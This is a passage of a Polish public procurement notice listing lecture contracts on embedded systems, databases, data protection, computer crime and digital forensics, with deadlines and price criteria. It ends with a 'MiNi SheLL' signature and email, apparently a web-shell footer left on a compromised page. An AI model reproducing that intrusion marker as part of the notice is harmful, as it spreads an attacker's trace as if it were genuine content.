<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Konstrukcja i oprogramowanie systemów wbudowanych dla studentów II semestru kierunku Informatyka przemysłowa, studia niestacjonarne II stopnia, specjalność Systemy Przemysłowe Czasu Rzeczywistego. Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat konstrukcji i oprogramowania systemów wbudowanych. Szczegółowy zakres zajęć:
Pod nadzorem prowadzącego oraz przy wykorzystaniu dostępnych stanowisk laboratoryjnych Politechniki Śląskiej (sprzętu oraz oprogramowania) student realizuje całość procesu projektowania począwszy od sprecyzowania założeń, poprzez podział funkcji na realizowane przez sprzęt i oprogramowanie, opracowanie koncepcji systemu, zaprojektowanie algorytmu oprogramowania, schematu ideowego uwzględniającego parametry elektryczne elementów, napisanie oprogramowania, wykonanie prototypu systemu, a na końcu opracowanie dokumentacji. Ponadto każde zbudowane przez studentów urządzenie poddane zostanie badaniom EMC (ang. ElectroMagnetic Compatibility) w Laboratorium Kompatybilności Elektromagnetycznej Politechniki Śląskiej w celu zweryfikowania jego zgodności z obowiązującymi wymaganiami w Unii Europejskiej co do poziomu emisji i odporności na zaburzenia elektromagnetyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Bazy danych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Bazy danych dla studentów III roku kierunku Informatyka przemysłowa, studia stacjonarne I stopnia.
Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat bazy danych. 
Szczegółowy zakres zajęć:
1.MySQL
2.HeidiSQL
3.Oracle Datamodeler
4.Tworzenie aplikacji bazodanowych:
5.Java JDK v6
6.Eclipse
7.Hibernate
8.JUnit
9.Log4J
10.JavaDB.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9 - Przeprowadzenie zajęć  z przedmiotu Ochrona Danych Osobowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Ochrona Danych Osobowych dla studentów I roku kierunku Informatyka przemysłowa, studia stacjonarne II stopnia. Celem zajęć jest poszerzenie wiedzy teoretycznej i praktycznej uczestników na temat ochrony danych osobowych. 
Szczegółowy zakres zajęć:
1.Ustawa o ochronie danych osobowych - treść i założenia
2.Podstawowe pojęcia i podstawy prawne ochrona danych osobowych
3.Prawa i obowiązki administratora danych osobowych:
3.1.Podstawa przetwarzania danych osobowych
3.2.Zasady udostępniania danych w kontekście ustawy
3.3.Dozwolone wykorzystanie danych osobowych w działaniach marketingowych firmy
3.4.Obowiązek informacyjny
4.Powierzenie przetwarzania danych osobowych
5.Przetwarzanie danych kadrowych:
5.1.Uprawnienia pracodawcy do dysponowania danymi pracownika 
5.2.Monitoring pracownika
5.3.Szczególna ochrona danych związkowych, danych o stanie zdrowia 
6.Obowiązek rejestracji i aktualizacji baz danych:
6.1.Bazy podlegające rejestracji?
6.2.Sposób rejestracji bazy danych (platforma e-GIODO)
6.3.Potencjalne konsekwencje niezarejestrowania bazy danych
7.Administratora Bezpieczeństwa Informacji - rola i zadania:
7.1.Obowiązki administratora w kontekście ustawy 
8.Instytucja Generalnego Inspektora Ochrony Danych Osobowych (GIODO):
8.1.Kompetencje i zadania GIODO
8.2.Praktyki kontrolne GIODO
9.Nowe technologie, a ochrona danych osobowych 
9.1.Portale społecznościowe
9.2.Pliki Cookies, geolokalizacja, biały wywiad
9.3.Dane osobowe w usługach elektronicznych 
10.Bezpieczeństwo danych osobowych
10.1.Obowiązek zabezpieczenia systemów informatycznych
10.2.Polityka bezpieczeństwa
11.Zasady przekazywania danych osobowych poza granicę państwa
12.Odpowiedzialność prawna w wypadku naruszenia przepisów ustawy
12.1.Odpowiedzialność cywilna, 
12.2.Odpowiedzialność dyscyplinarna,
12.3.Odpowiedzialność karna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10 - Przeprowadzenie zajęć  z przedmiotu Nadużycia komputerowe z elementami kryminalistyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Nadużycia komputerowe z elementami kryminalistyki dla studentów I roku, II stopnia kierunku Informatyka przemysłowa dla studiów stacjonarnych i niestacjonarnych.
Celem zajęć jest poszerzenie wiedzy teoretycznej uczestników na temat nadużycia komputerowego z elementami kryminalistyki. 
Szczegółowy zakres zajęć:
1.Problematyka nadużyć
2.Kryminalistyka jako nauka: 
2.1.Historia
2.2.Aspekty związane z poszczególnymi dziedzinami kryminalistyki 
2.3.Teoria dowodu
2.4.Dowód elektroniczny
2.5.Informatyka śledcza 
3.Historia nadużyć komputerowych 
3.1.Rodzaje nadużyć komputerowych
3.2.Ewolucja polskich przepisów karnych
4.Metodyka pracy w śledztwach dot. nadużyć komputerowych
4.1.Pojęcie prowokacji policyjnej
4.2.Organy uprawnione do prowadzenia postępowania
4.3.Instytucja biegłego sądowego, instytucje specjalistyczne, instytucje naukowe, opinie prywatne,  naczelne zasady
5.Cyberprzestępczość
5.1.Pojęcie cyberprzestępczości
5.2.Metody walki z cyberprzestępczością
6.Prawo karne zasady i założenia 
6.1.Definicja przestępstwa 
6.2.Wina: umyślna, nieumyślność, sankcja karna ,
6.3.Przestępstwa,  a wykroczenia, 
6.4.Dobra zagrożone, przestępstwo indywidualne i powszechne
7.Aspekty postępowań karnych
7.1.Postępowanie wykroczeniowe
7.2.Postępowanie z urzędu 
7.3.Postępowanie prywatnoskargowe oraz cywilne
8.Pojęcie przestępstw komputerowych
8.1.Podział przestępstw komputerowych
9.Omówienie przestępstw popełnianych z użyciem komputerów
9.1.Przestępstwa związane z podsłuchem komputerowym
9.2.Haking komputerowy, a naruszenie integralności danych
9.3.Oszustwa oraz oszustwa komputerowe
9.4.Defraudacje gospodarcze 
9.5.Znieważenie, pomówienie
9.6.Naruszenia danych osobowych, kradzież tożsamości 
9.7.Treści zakazane
9.8.Paserstwo komputerowe, kradzież komputerowa, a zwykła kradzież
9.9.Naruszenia praw autorskich, własność przemysłowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11 - Przeprowadzenie zajęć  z przedmiotu Podstawy informatyki śledczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Podstawy informatyki śledczej dla studentów I roku, II stopnia kierunku Informatyka przemysłowa dla studiów stacjonarnych.Celem zajęć jest poszerzenie wiedzy teoretycznej uczestników na temat nadużyć komputerowych.
Szczegółowy zakres zajęć:
1.Współpraca organów ścigania z operatorami telefonii komórkowych. Możliwości określania lokalizacji telefonu przez operatorów.
2.Specjalistyczne metody odzyskiwania danych oraz analiza nośników danych w zakresie przestępstw  gospodarczych.
3.Zabezpieczanie dowodów elektronicznych na miejscu zdarzeń. Współpraca biegłego sądowego z organami ścigania.
4.Wirtualizacja systemu operacyjnego podejrzanego. Analiza działań hackerskich i złośliwego oprogramowania.
5.Charakterystyka przestępstw z użyciem elektronicznych środków płatniczych.
6.Identyfikacja sprawców przestępstw popełnianych z wykorzystaniem nowych technologii informatycznych. Rozpoznawanie i monitorowanie obszarów zagrożonych cyberprzestępczością. 
7.Zaawansowane metody autoryzacji biometrycznej. Systemy, metody, algorytmy.
8.Metody prowadzenia postępowań przygotowawczych oraz specyfika zabezpieczeń sprzętu w przypadku przestępstw komputerowych.
9.Analiza zawartości urządzeń mobilnych. Ujawnianie, odzyskiwanie i zabezpieczanie informacji zawartych na kartach SIM oraz w pamięci telefonów.
10.Najpopularniejsze oprogramowanie wykorzystywane do analizy nośników. Porównanie funkcjonalności.
11.Specjalistyczna analiza zachowań sprawców w sieci Internet w zakresie zorganizowanych grup przestępczych.
12.Wykorzystanie narzędzi eDiscovery w sprawach związanych ze szpiegostwem gospodarczym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com